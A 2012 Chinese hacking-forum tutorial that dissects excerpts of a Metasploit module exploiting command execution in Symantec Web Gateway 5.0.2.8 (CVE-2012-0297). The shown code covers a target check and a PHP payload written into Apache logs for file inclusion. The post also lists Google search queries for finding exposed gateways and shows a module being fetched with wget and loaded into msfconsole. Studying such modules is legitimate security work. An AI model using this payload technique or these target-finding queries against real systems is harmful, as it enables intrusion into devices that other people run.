切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
39 插队:微观metasploit的漏洞源代码[复制链接]
发表于 2012-8-12 23:54:21 | 显示全部楼层 |!read_mode!
微观例子:Symantec Web Gateway 5.0.2.8 Command Execution 地址:http://packetstormsecurity.org/f ... mand-Execution.html
首先简单的看一下:
  1. require 'msf/core'

  2. class Metasploit3 < Msf::Exploit::Remote
  3.   Rank = ExcellentRanking
复制代码


Rank 是成功率的意思
  1. 'References'     =>
  2.         [
  3.           ['CVE', '2012-0297'],
  4.           ['EDB', '18932'],
  5.           ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00']
  6.         ],
复制代码
这里是漏洞的参考!
  1.    'Platform'       => ['php'],
  2.       'Arch'           => ARCH_PHP,
  3.       'Targets'        =>
  4.         [
  5.           ['Symantec Web Gateway 5.0.2.8', {}],
  6.         ],
  7.       'Privileged'     => false,
  8.       'DisclosureDate' => "May 17 2012",
  9.       'DefaultTarget'  => 0))
  10.   end
复制代码
目标参数的分类等的设置
  1. def check
  2.     res = send_request_raw({
  3.       'method' => 'GET',
  4.       'uri'    => '/spywall/login.php'
  5.     })

  6.     if res and res.body =~ /\Symantec Web Gateway\<\/title\>/
  7.       return Exploit::CheckCode::Detected
  8.     else
  9.       return Exploit::CheckCode::Safe
  10.     end
  11.   end
复制代码


判断过程
  1. def exploit
  2.     peer = "#{rhost}:#{rport}"

  3.     php = %Q|<!--?php #{payload.encoded} ?-->|
复制代码
留后门的方式 SHELLCODE,这里是PHP
简单的说了下,微观他,他存在的漏洞原理很简单 PHP包含文件 通过写入APACHE日志来获得SHELL,原理:http://wenku.baidu.com/view/f54b511b6bd97f192279e947.html
在某些情况下,我们可以简单的分析源代码来获得漏洞的信息,在默认情况下获得不了目的我们能通过原理进行渗透,我们还能进行深一步,例如我通过简单的看了下这个漏洞晓得了他的原理,并且获得了GOOGLE关键字:


  1. “Symantec Web Gateway” inurl:spywall
复制代码
关键字2
  1. “Symantec Web Gateway - Login” inurl:login.php
复制代码


metasploit的漏洞代码放在哪里? 在这里:
  1. root@Dis9Team:/pen/msf3# cd modules/
  2. root@Dis9Team:/pen/msf3/modules# ls
  3. auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post
  4. root@Dis9Team:/pen/msf3/modules#
复制代码


分得很清楚 本地 远程 等等 如果我下载了一个MSF漏洞模块 我改放在哪里? 进入你的用户目录 直接输入 cd 回车
  1. root@Dis9Team:/pen/msf3/modules# cd
  2. root@Dis9Team:~# pwd
  3. /root
  4. root@Dis9Team:~#
复制代码


root@Dis9Team:~# cd .msf4/
  1. root@Dis9Team:~/.msf4# ls
  2. history  local  logs  loot  modcache  modules  plugins  schema
  3. root@Dis9Team:~/.msf4#
复制代码


插件放入plugins目录 单独目录放书modules目录 history文件是使用历史
  1. root@Dis9Team:~/.msf4# head history
  2. exit
  3. exit
  4. exit -y
  5. jobs
  6. exit -y
  7. exit
  8. exit -j
  9. exit -j
  10. exit
  11. exit
  12. root@Dis9Team:~/.msf4#
复制代码


logs文件夹是会话记录
modules目录什么都没?
  1. root@Dis9Team:~/.msf4# cd modules/
  2. root@Dis9Team:~/.msf4/modules# ls
  3. root@Dis9Team:~/.msf4/modules#
复制代码


看我演示:
  1. root@Dis9Team:~/.msf4/modules# mkdir exploits
  2. root@Dis9Team:~/.msf4/modules# cd exploits/
  3. root@Dis9Team:~/.msf4/modules/exploits# mkdir test
  4. root@Dis9Team:~/.msf4/modules/exploits# cd test/
  5. root@Dis9Team:~/.msf4/modules/exploits/test# wget dis9.com/cs.rb
  6. root@Dis9Team:~/.msf4/modules/exploits/test# msfconsole
  7. msf > use exploit/test/cs
  8. msf  exploit(cs) >
复制代码


OK

相关帖子

操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-11-28 03:29

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部